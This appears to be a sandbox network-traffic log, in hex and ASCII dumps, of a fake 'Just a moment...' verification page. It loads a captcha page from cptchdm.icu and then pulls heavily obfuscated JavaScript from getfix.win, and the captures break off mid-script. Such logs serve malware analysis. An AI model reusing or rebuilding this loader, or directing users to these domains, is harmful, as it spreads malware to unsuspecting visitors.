2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 20 64 61 74 61 2d 73 63 72 61 70 62 6f 6f 6b 2d 73 6f 75 72 63 65 3d 22 68 74 74 70 73 3a 2f 2f 76 6f 69 63 65 6d 6f 64 2e 6e 65 74 2f 6c 74 63 2f 74 78 2f 30 35 30 61 34 37 38 33 64 35 36 61 64 63 64 37 64 61 31 61 32 64 63 61 34 37 30 63 63 33 39 65 62 63 32 31 64 62 66 62 62 33 33 34 34 61 62 63 61 64 64 35 33 66 33 64 63 63 63 31 31 66 64 61 2f 22 20 64 61 74 61 2d 73 63 72 61 70 62 6f 6f 6b 2d 63 72 65 61 74 65 3d 22 32 30 32 34 30 39 32 32 31 30 34 36 32 33 33 30 22 20 64 61 74 61 2d 73 63 72 61 70 62 6f 6f 6b 2d 74 69 74 6c 65 3d 22 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d Data Ascii: <!DOCTYPE html><html lang="en-US" dir="ltr" data-scrapbook-source="https://voicemod.net/ltc/tx/050a4783d56adcd7da1a2dca470cc39ebc21dbfbb3344abcadd53f3dccc11fda/" data-scrapbook-create="2024092210462330" data-scrapbook-title="Just a moment..."><meta http-
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 20 2f 2a 20 47 65 6e 65 72 61 6c 20 53 74 79 6c 69 6e 67 20 2a 2f 0a 20 0a 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 66 69 6c 74 65 72 20 30 2e 33 73 20 65 61 73 65 3b 0a 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 7d 0a 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 72 65 6d 3b 0a 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 7d 0a 20 20 20 20 20 2f 2a 20 43 68 65 63 6b 62 6f 78 20 53 74 79 6c 69 6e 67 20 2a 2f 0a 20 20 20 20 20 2e 63 68 65 63 6b 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 3b 0a 20 20 20 20 Data Ascii: /* General Styling / .content { transition: filter 0.3s ease; z-index: 1; } h1 { font-size: 2rem; margin-bottom: 10px; } / Checkbox Styling */ .checkbox-container { margin: 20px 0;
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 70 78 3b 0a 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 64 65 49 6e 20 30 2e 33 73 20 65 61 73 65 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 7d 0a 20 20 20 20 20 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 62 6f 78 20 68 32 20 7b 0a 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 72 65 6d 3b 0a 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 7d 0a 20 20 20 20 20 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 62 6f 78 20 70 20 7b 0a 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 20 7d 0a 20 20 20 20 20 2f 2a 20 4c 6f 61 64 69 6e 67 20 73 70 69 6e 6e 65 72 20 69 6e Data Ascii: px; animation: fadeIn 0.3s ease forwards; position: relative; } .verification-box h2 { font-size: 1.2rem; margin-bottom: 10px; } .verification-box p { margin: 10px 0; } /* Loading spinner in
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 20 7b 0a 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 0a 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 2e 32 35 72 65 6d 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 37 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 2e 68 32 20 7b 0a 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 72 65 6d 0a 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e Data Ascii: { font-size: 1.5rem; font-weight: 500; line-height: 2.25rem } @media (width <=720px) { .h2 { font-size: 1.25rem; line-height: 1.5rem } } #challenge-error-text { backgroun
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 69 64 74 68 20 77 68 65 6e 20 65 78 70 61 6e 64 65 64 20 2a 2f 0a 20 7d 0a 20 0a 20 2e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 7b 0a 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 2f 2a 20 57 68 69 74 65 20 74 65 78 74 20 66 6f 72 20 72 65 61 64 61 62 69 6c 69 74 79 20 2a 2f 0a 20 7d 0a 20 0a 20 2e 69 6e 73 74 72 75 63 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0a 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 3b 20 2f 2a 20 41 64 64 20 73 70 61 63 69 6e 67 20 62 65 74 77 65 65 6e 20 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 2a 2f 0a 20 7d 0a 20 0a 20 2e 74 65 78 74 2d 63 65 6e 74 65 72 20 7b 0a 20 74 65 78 74 2d Data Ascii: idth when expanded / } .instructions { margin-top: 20px; font-size: 16px; color: #fff; / White text for readability / } .instruction-text { font-size: 15px; margin: 10px 0; / Add spacing between instructions */ } .text-center { text-
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 23 33 31 33 31 33 31 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 20 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 31 29 20 7b 0a 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 34 35 73 3b 0a 20 20 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 20 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 20 7b 0a 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 73 3b 0a 20 20 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 20 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 20 7b 0a 20 20 20 20 20 20 Data Ascii: #313131 transparent transparent transparent; } .lds-ring div:nth-child(1) { animation-delay: -0.45s; } .lds-ring div:nth-child(2) { animation-delay: -0.3s; } .lds-ring div:nth-child(3) {
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 3a 20 23 64 39 64 39 64 39 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 61 20 7b 0a 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 65 65 37 33 30 61 3b 0a 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 Data Ascii: : #d9d9d9 } body.theme-dark a { color: #fff } body.theme-dark a:hover { color: #ee730a; text-decoration: underline } body.theme-dark .lds-ring div { border-color: #999 transparent transparent
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 65 73 74 72 65 6e 64 69 6e 67 74 6f 6b 65 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 31 33 38 39 36 37 36 61 34 36 34 31 65 66 38 65 33 62 34 37 39 30 63 66 30 36 30 36 33 32 34 39 64 34 31 31 61 36 39 32 2e 73 76 67 22 29 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 62 6f 64 79 2e 74 68 65 6d 65 2d 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 67 65 74 74 72 75 6d 70 6d 65 6d 65 73 2e 67 65 74 74 72 75 6d 70 6d 65 6d 65 73 74 72 65 6e 64 69 6e 67 74 6f 6b 65 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 63 61 30 33 34 38 36 66 31 34 65 63 33 38 63 64 35 65 64 36 33 37 37 66 65 36 66 35 36 63 31 61 35 37 Data Ascii: estrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a692.svg") } body.theme-light #challenge-error-text { background-image: url("https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a57
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 2e 63 6f 72 65 2d 6d 73 67 2c 0a 20 20 20 20 20 2e 68 32 20 7b 0a 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 0a 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 2e 32 35 72 65 6d 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 2e 62 6f 64 79 2d 74 65 78 74 2c 0a 20 20 20 20 20 2e 63 6f 72 65 2d 6d 73 67 20 7b 0a 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 2e 62 6f 64 79 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 35 72 65 6d Data Ascii: font-weight: 500 } .core-msg, .h2 { font-size: 1.5rem; line-height: 2.25rem } .body-text, .core-msg { font-weight: 400 } .body-text { font-size: 1rem; line-height: 1.25rem
2025-10-17 06:51:38 UTC	1460	IN	Data Raw: 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 72 65 6d 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 20 7b 0a 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 2e 35 72 65 6d 3b 0a 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 0a 20 20 20 20 20 7d 0a 20 0a 20 20 20 20 20 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 20 Data Ascii: padding-top: 1rem } .clearfix:after { clear: both; content: ""; display: table } .clearfix .column { float: left; padding-right: 1.5rem; width: 50% } .diagnostic-wrapper {
2025-10-17 06:51:38 UTC	745	OUT	GET /captcha.html HTTP/1.1 Host: cptchdm.icu Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Sec-Fetch-Storage-Access: active Referer: https://cptchdm.icu/?ref=thefatshallot.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:38 UTC	286	IN	HTTP/1.1 200 OK Server: nginx/1.28.0 Date: Fri, 17 Oct 2025 06:51:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 400606 Connection: keep-alive Last-Modified: Wed, 24 Sep 2025 14:30:18 GMT ETag: "61cde-63f8ce4459280" Accept-Ranges: bytes Vary: Accept-Encoding

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:38 UTC	420	OUT	GET /jsrepo?rnd=0.3805456465715724&ts=1760683897314 HTTP/1.1 Host: getfix.win Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:39 UTC	567	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 17 Oct 2025 06:51:38 GMT Content-Type: application/javascript; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: * Set-Cookie: 053547622c34ce11f77d337a4818af78=YTo0OntpOjA7aTowO2k6MTtpOjE7aToyO2E6Mjp7aTowO2k6MTtpOjE7aTowO31pOjM7aToxNzYzMjc1ODk4O30%3D; expires=Sun, 16 Nov 2025 06:51:38 GMT; Max-Age=2592000; path=/; HttpOnly; SameSite=Lax Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0 Pragma: no-cache Expires: 0 Content-Length: 95958
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 64 64 66 65 64 2c 5f 30 78 34 38 37 33 65 36 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 39 64 36 65 63 28 5f 30 78 32 63 61 36 33 63 2c 5f 30 78 31 32 39 31 66 63 2c 5f 30 78 31 30 63 64 30 35 2c 5f 30 78 33 38 31 64 31 38 2c 5f 30 78 36 61 35 38 61 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 38 32 28 5f 30 78 36 61 35 38 61 61 2d 30 78 32 37 65 2c 5f 30 78 31 30 63 64 30 35 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 31 37 39 66 63 28 5f 30 78 32 38 39 62 37 33 2c 5f 30 78 34 39 62 36 62 38 2c 5f 30 78 33 32 66 64 36 64 2c 5f 30 78 35 34 34 37 31 35 2c 5f 30 78 33 35 31 33 30 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 38 32 28 5f 30 78 33 32 66 64 36 64 2d 20 2d 30 78 32 65 65 2c 5f 30 78 35 34 34 37 31 Data Ascii: (function(_0x4ddfed,_0x4873e6){function _0x59d6ec(_0x2ca63c,_0x1291fc,_0x10cd05,_0x381d18,_0x6a58aa){return _0x4582(_0x6a58aa-0x27e,_0x10cd05);}function _0x1179fc(_0x289b73,_0x49b6b8,_0x32fd6d,_0x544715,_0x35130f){return _0x4582(_0x32fd6d- -0x2ee,_0x54471
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 36 2a 30 78 38 39 2b 2d 30 78 32 34 37 29 3b 69 66 28 5f 30 78 33 35 34 37 36 36 3d 3d 3d 5f 30 78 34 38 37 33 65 36 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 31 38 30 61 61 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 31 38 30 61 61 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 34 34 64 35 31 61 29 7b 5f 30 78 33 31 38 30 61 61 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 31 38 30 61 61 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 5f 30 78 34 61 33 33 2c 2d 30 78 34 34 66 61 33 2b 2d 30 78 61 34 2a 30 78 32 32 66 2b 2d 30 78 32 2a 2d 30 78 34 31 34 63 64 29 29 3b 63 6f 6e 73 74 20 5f 30 78 33 65 37 38 64 63 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 64 36 35 35 63 28 5f 30 78 34 63 66 63 31 63 2c Data Ascii: 60x89+-0x247);if(_0x354766===_0x4873e6)break;else _0x3180aa['push'](_0x3180aa['shift']());}catch(_0x44d51a){_0x3180aa['push'](_0x3180aa['shift']());}}}(_0x4a33,-0x44fa3+-0xa40x22f+-0x2*-0x414cd));const _0x3e78dc=(function(){function _0x1d655c(_0x4cfc1c,
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 30 78 35 31 66 2c 30 78 35 38 36 29 2c 27 70 77 75 70 49 27 3a 5f 30 78 31 62 39 31 63 34 28 30 78 34 35 61 2c 30 78 34 66 33 2c 30 78 34 37 66 2c 30 78 35 33 66 2c 30 78 34 64 31 29 2b 5f 30 78 35 61 33 63 63 35 28 30 78 36 62 64 2c 30 78 36 37 36 2c 30 78 36 36 36 2c 30 78 35 65 39 2c 30 78 35 61 64 29 2b 27 6e 27 2c 27 65 68 71 46 5a 27 3a 5f 30 78 31 64 36 35 35 63 28 30 78 32 36 64 2c 30 78 32 31 33 2c 30 78 32 34 64 2c 30 78 32 61 35 2c 30 78 32 65 33 29 2b 5f 30 78 31 62 39 31 63 34 28 30 78 35 34 64 2c 30 78 35 39 62 2c 30 78 34 64 34 2c 30 78 35 35 33 2c 30 78 35 37 64 29 2b 5f 30 78 31 64 36 35 35 63 28 30 78 33 30 62 2c 30 78 32 64 61 2c 30 78 33 33 31 2c 30 78 32 37 39 2c 30 78 32 37 37 29 2c 27 68 67 72 6e 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 Data Ascii: 0x51f,0x586),'pwupI':_0x1b91c4(0x45a,0x4f3,0x47f,0x53f,0x4d1)+_0x5a3cc5(0x6bd,0x676,0x666,0x5e9,0x5ad)+'n','ehqFZ':_0x1d655c(0x26d,0x213,0x24d,0x2a5,0x2e3)+_0x1b91c4(0x54d,0x59b,0x4d4,0x553,0x57d)+_0x1d655c(0x30b,0x2da,0x331,0x279,0x277),'hgrnN':function(
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 65 28 30 78 33 61 38 2c 30 78 33 62 34 2c 30 78 33 64 36 2c 30 78 33 32 35 2c 30 78 32 63 66 29 5d 2c 27 68 46 44 68 6a 27 3a 5f 30 78 32 33 31 32 62 32 5b 5f 30 78 35 63 38 36 63 65 28 30 78 33 34 36 2c 30 78 33 32 64 2c 30 78 33 63 39 2c 30 78 33 65 30 2c 30 78 33 64 31 29 5d 2c 27 51 58 44 53 73 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 30 38 35 61 2c 5f 30 78 35 39 63 37 31 35 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 61 30 35 32 32 28 5f 30 78 31 30 35 61 37 63 2c 5f 30 78 33 38 35 35 32 35 2c 5f 30 78 35 34 31 66 66 33 2c 5f 30 78 33 63 30 35 30 66 2c 5f 30 78 34 64 65 65 33 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 35 66 63 35 28 5f 30 78 33 38 35 35 32 35 2d 30 78 33 37 31 2c 5f 30 78 33 38 35 35 32 35 2d 30 78 31 35 38 2c 5f 30 78 35 Data Ascii: e(0x3a8,0x3b4,0x3d6,0x325,0x2cf)],'hFDhj':_0x2312b2[_0x5c86ce(0x346,0x32d,0x3c9,0x3e0,0x3d1)],'QXDSs':function(_0x10085a,_0x59c715){function _0x2a0522(_0x105a7c,_0x385525,_0x541ff3,_0x3c050f,_0x4dee3f){return _0x455fc5(_0x385525-0x371,_0x385525-0x158,_0x5
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 78 31 65 62 34 64 61 2d 30 78 37 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 33 64 33 63 65 28 5f 30 78 34 33 62 38 39 30 2c 5f 30 78 32 38 64 32 32 38 2c 5f 30 78 31 64 35 30 35 39 2c 5f 30 78 32 64 64 62 32 64 2c 5f 30 78 33 30 38 37 34 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 34 66 63 39 62 28 5f 30 78 34 33 62 38 39 30 2d 30 78 61 61 2c 5f 30 78 32 64 64 62 32 64 2d 30 78 33 63 63 2c 5f 30 78 34 33 62 38 39 30 2c 5f 30 78 32 64 64 62 32 64 2d 30 78 39 32 2c 5f 30 78 33 30 38 37 34 30 2d 30 78 31 34 37 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 32 65 32 32 62 37 3d 7b 27 57 48 74 66 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 36 39 34 34 2c 5f 30 78 33 62 66 32 64 37 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 39 64 38 35 30 28 5f 30 78 32 63 Data Ascii: x1eb4da-0x78);}function _0x33d3ce(_0x43b890,_0x28d228,_0x1d5059,_0x2ddb2d,_0x308740){return _0x44fc9b(_0x43b890-0xaa,_0x2ddb2d-0x3cc,_0x43b890,_0x2ddb2d-0x92,_0x308740-0x147);}const _0x2e22b7={'WHtfT':function(_0x176944,_0x3bf2d7){function _0x59d850(_0x2c
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 64 2c 2d 30 78 34 37 29 5d 2c 5f 30 78 32 65 32 32 62 37 5b 5f 30 78 35 37 33 35 61 66 28 30 78 33 63 64 2c 30 78 31 63 35 2c 30 78 33 65 34 2c 30 78 32 64 61 2c 30 78 33 33 32 29 5d 29 29 5b 5f 30 78 34 63 65 64 61 62 28 2d 30 78 31 62 61 2c 2d 30 78 31 38 30 2c 30 78 35 39 2c 2d 30 78 36 61 2c 2d 30 78 61 64 29 5d 28 5f 30 78 32 65 32 32 62 37 5b 5f 30 78 34 63 65 64 61 62 28 30 78 63 35 2c 30 78 31 36 2c 30 78 32 66 2c 30 78 62 63 2c 2d 30 78 32 65 29 5d 29 29 3b 65 6c 73 65 7b 69 66 28 5f 30 78 32 30 63 63 38 66 29 7b 69 66 28 5f 30 78 32 33 31 32 62 32 5b 5f 30 78 34 63 65 64 61 62 28 2d 30 78 31 36 61 2c 2d 30 78 32 33 66 2c 2d 30 78 31 66 63 2c 2d 30 78 31 35 63 2c 2d 30 78 31 32 39 29 5d 28 5f 30 78 32 33 31 32 62 32 5b 5f 30 78 34 63 65 64 61 62 Data Ascii: d,-0x47)],_0x2e22b7[_0x5735af(0x3cd,0x1c5,0x3e4,0x2da,0x332)]))[_0x4cedab(-0x1ba,-0x180,0x59,-0x6a,-0xad)](_0x2e22b7[_0x4cedab(0xc5,0x16,0x2f,0xbc,-0x2e)]));else{if(_0x20cc8f){if(_0x2312b2[_0x4cedab(-0x16a,-0x23f,-0x1fc,-0x15c,-0x129)](_0x2312b2[_0x4cedab
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 32 37 31 2c 30 78 31 62 63 2c 30 78 31 63 61 2c 30 78 31 38 33 2c 30 78 31 39 62 29 2b 5f 30 78 33 38 30 31 34 63 28 30 78 34 61 62 2c 30 78 33 33 61 2c 30 78 34 30 36 2c 30 78 33 33 65 2c 30 78 34 37 37 29 5d 28 29 5b 5f 30 78 33 38 30 31 34 63 28 30 78 34 34 38 2c 30 78 33 38 38 2c 30 78 33 65 39 2c 30 78 33 32 64 2c 30 78 34 38 32 29 2b 27 68 27 5d 28 5f 30 78 33 62 65 66 30 66 5b 5f 30 78 32 35 63 63 39 66 28 30 78 34 61 33 2c 30 78 35 37 30 2c 30 78 35 39 63 2c 30 78 34 39 65 2c 30 78 35 30 34 29 5d 29 5b 5f 30 78 33 38 30 31 34 63 28 30 78 35 30 39 2c 30 78 34 62 33 2c 30 78 34 34 35 2c 30 78 33 38 35 2c 30 78 33 39 39 29 2b 5f 30 78 32 35 63 63 39 66 28 30 78 35 38 35 2c 30 78 35 34 39 2c 30 78 36 35 66 2c 30 78 34 63 34 2c 30 78 35 32 30 29 5d 28 Data Ascii: 271,0x1bc,0x1ca,0x183,0x19b)+_0x38014c(0x4ab,0x33a,0x406,0x33e,0x477)]()[_0x38014c(0x448,0x388,0x3e9,0x32d,0x482)+'h'](_0x3bef0f[_0x25cc9f(0x4a3,0x570,0x59c,0x49e,0x504)])[_0x38014c(0x509,0x4b3,0x445,0x385,0x399)+_0x25cc9f(0x585,0x549,0x65f,0x4c4,0x520)](
2025-10-17 06:51:39 UTC	1460	IN	Data Raw: 34 61 39 2c 30 78 35 33 34 2c 30 78 35 35 62 2c 30 78 34 33 62 29 2c 27 62 42 70 6d 64 27 3a 5f 30 78 35 62 62 65 30 34 28 30 78 32 39 35 2c 30 78 31 35 38 2c 30 78 33 30 61 2c 30 78 33 34 65 2c 30 78 32 33 38 29 2b 5f 30 78 34 35 36 65 37 39 28 30 78 33 36 32 2c 30 78 32 36 36 2c 30 78 32 39 37 2c 30 78 33 63 35 2c 30 78 33 34 36 29 2c 27 79 48 57 7a 4f 27 3a 5f 30 78 34 39 33 66 62 30 28 30 78 33 62 30 2c 30 78 33 32 34 2c 30 78 33 32 66 2c 30 78 32 64 36 2c 30 78 33 63 65 29 2c 27 5a 4f 62 72 6c 27 3a 5f 30 78 35 62 62 65 30 34 28 30 78 31 66 35 2c 30 78 31 31 33 2c 30 78 31 39 31 2c 30 78 32 32 64 2c 30 78 31 38 32 29 2b 5f 30 78 65 31 37 37 61 64 28 30 78 35 30 64 2c 30 78 35 61 34 2c 30 78 36 31 31 2c 30 78 33 66 38 2c 30 78 35 63 31 29 2c 27 41 4f Data Ascii: 4a9,0x534,0x55b,0x43b),'bBpmd':_0x5bbe04(0x295,0x158,0x30a,0x34e,0x238)+_0x456e79(0x362,0x266,0x297,0x3c5,0x346),'yHWzO':_0x493fb0(0x3b0,0x324,0x32f,0x2d6,0x3ce),'ZObrl':_0x5bbe04(0x1f5,0x113,0x191,0x22d,0x182)+_0xe177ad(0x50d,0x5a4,0x611,0x3f8,0x5c1),'AO
